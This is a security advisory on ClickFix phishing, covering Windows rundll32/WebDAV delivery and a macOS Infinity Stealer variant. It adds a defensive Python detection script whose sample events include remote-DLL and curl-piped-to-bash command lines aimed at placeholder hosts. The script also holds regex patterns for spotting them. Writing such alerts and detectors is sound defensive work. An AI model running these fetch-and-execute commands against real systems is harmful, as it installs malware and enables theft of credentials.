Phishing Alert – ClickFix Tactics Evolve, Now Attacking Both Windows and macOS
Type: Phishing
Phishing Alert
Current Status and Related Trends
Recent threat intelligence indicates that ClickFix tactics, originally targeting Microsoft Windows, have now evolved with a new variant aimed at macOS. This expansion demonstrates that the technique is increasingly being deployed by multiple attackers.
Traditional Windows-focused ClickFix attacks
These campaigns mimic the familiar “Verify You are a Human” tests commonly used by websites to distinguish legitimate users from bots. Victims are prompted to press specific keyboard combinations, which ultimately result in the download and execution of malicious software on Microsoft Windows systems.
The deceptive process typically unfolds as follows:
- The user is instructed to press the Windows key and the letter “R” simultaneously, opening the Windows “Run” prompt capable of executing any program already installed on the system.
- The user is told to press CTRL + V, pasting malicious code from the site’s virtual clipboard into the Run prompt.
- Pressing Enter executes the pasted code, initiating the download and installation of malware.
Latest Windows Variant – Abusing Windows components Rundll32 & WebDAV
The most recent ClickFix variant abuses legitimate Windows components, rundll32.exe and WebDAV, to deliver payloads. It loads remote DLLs from a WebDAV share and invokes their exports by ordinal, reducing reliance on script engines and evading detection logic that watches PowerShell or other script hosts. This shift to native Windows components, combined with anti-analysis techniques, makes the attack stealthier and harder to detect.
(ClickFix attack targeting Windows users)
macOS Variant – Infinity Stealer
A new macOS-targeted ClickFix variant delivers Infinity Stealer via fake Cloudflare CAPTCHA lures. Victims are tricked into pasting a malicious curl command into the macOS Terminal, installing a Python-based infostealer compiled with Nuitka for enhanced evasion.
Infinity Stealer can:
- Steal credentials from Chromium-based browsers and Firefox
- Extract macOS Keychain entries
- Access cryptocurrency wallets
- Read plaintext secrets from developer files (e.g., `.env`)
All stolen data is exfiltrated via HTTP POST requests to the C2 server, with a Telegram alert sent to attackers upon completion. This campaign highlights ClickFix’s expansion from Windows to macOS, employing more advanced and stealthy techniques.
(ClickFix attack targeting macOS users)
(Ref: https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/)
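As an added example (not from the original alert or the cited report), the following Python script shows how a defender might screen process-creation telemetry for the two execution patterns described above: rundll32 loading a DLL from a WebDAV share by ordinal, and curl output piped into a shell from Terminal. The event records, host names and addresses are constructed for illustration; the field names assume a Sysmon- or ESF-style export.

```python
import re

# Constructed process-creation records in a Sysmon-/ESF-like shape; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "win-01", "parent": "explorer.exe",
     "cmd": r"rundll32.exe \\203.0.113.10@80\DavWWWRoot\update.dll,#2"},
    {"host": "win-02", "parent": "control.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"host": "mac-01", "parent": "Terminal",
     "cmd": 'bash -c "curl -fsSL http://198.51.100.7/v.sh | bash"'},
    {"host": "mac-02", "parent": "Terminal",
     "cmd": "curl -O https://example.org/release.tar.gz"},
]

# Windows: rundll32 pointed at a UNC/WebDAV share (\\host@port\DavWWWRoot\...) or a URL
REMOTE_DLL = re.compile(r"\\\\[\w.\-]+(?:@(?:SSL@)?\d+)?\\|https?://", re.I)
# Windows: export invoked by ordinal (",#N") instead of by name
ORDINAL_EXPORT = re.compile(r",\s*#\d+\b")
# macOS: curl output piped straight into a shell or interpreter
CURL_PIPE = re.compile(r"\bcurl\b[^|]*\|\s*(?:sudo\s+)?(?:(?:ba|z)?sh|python3?)\b")
# macOS: curl chained with making the download executable or running it
CURL_CHAIN = re.compile(r"\bcurl\b[^;&]*(?:;|&&)\s*(?:chmod\s+\+x|\./|(?:ba|z)?sh\s|python3?\s)")

def classify(event):
    """Return the reasons an event looks like ClickFix follow-on execution ([] if none)."""
    cmd, parent = event["cmd"], event["parent"].lower()
    reasons = []
    if "rundll32" in cmd.lower():
        if REMOTE_DLL.search(cmd):
            reasons.append("rundll32 loading a DLL from a UNC/WebDAV path or URL")
        if ORDINAL_EXPORT.search(cmd):
            reasons.append("rundll32 calling an export by ordinal")
        # The Run dialog (Win+R) launches children under explorer.exe; only meaningful with another hit
        if reasons and parent == "explorer.exe":
            reasons.append("spawned from explorer.exe, consistent with the Run dialog")
    if "curl" in cmd.lower():
        if CURL_PIPE.search(cmd):
            reasons.append("curl output piped into a shell or interpreter")
        if CURL_CHAIN.search(cmd):
            reasons.append("curl chained with chmod/execution of the download")
        if reasons and parent == "terminal":
            reasons.append("launched from Terminal, consistent with a pasted command")
    return reasons

def triage(events):
    """Map host -> reasons for every event that trips at least one rule."""
    return {e["host"]: r for e in events if (r := classify(e))}

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(reasons))
```

The benign records (a Control Panel applet loaded by name from System32, a plain archive download) produce no findings, which is the point of requiring a remote path, an ordinal call or a pipe into an interpreter rather than alerting on every rundll32 or curl execution.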
Recommendations
Organisations and individuals are urged to stay alert to evolving ClickFix phishing tactics, which now target both Windows and macOS systems, and take proactive measures to prevent compromise. To guard against related ClickFix attacks, please take the following measures:
- Do not follow suspicious CAPTCHA prompts or paste unknown commands into Windows Run prompts or macOS Terminal.
- Update and maintain security software to detect and block malicious rundll32 or curl activity.
- Block known malicious domains and monitor network traffic for unusual connections to C2 servers.
- Stay aware of phishing and social engineering tactics to avoid interacting with deceptive ClickFix lures.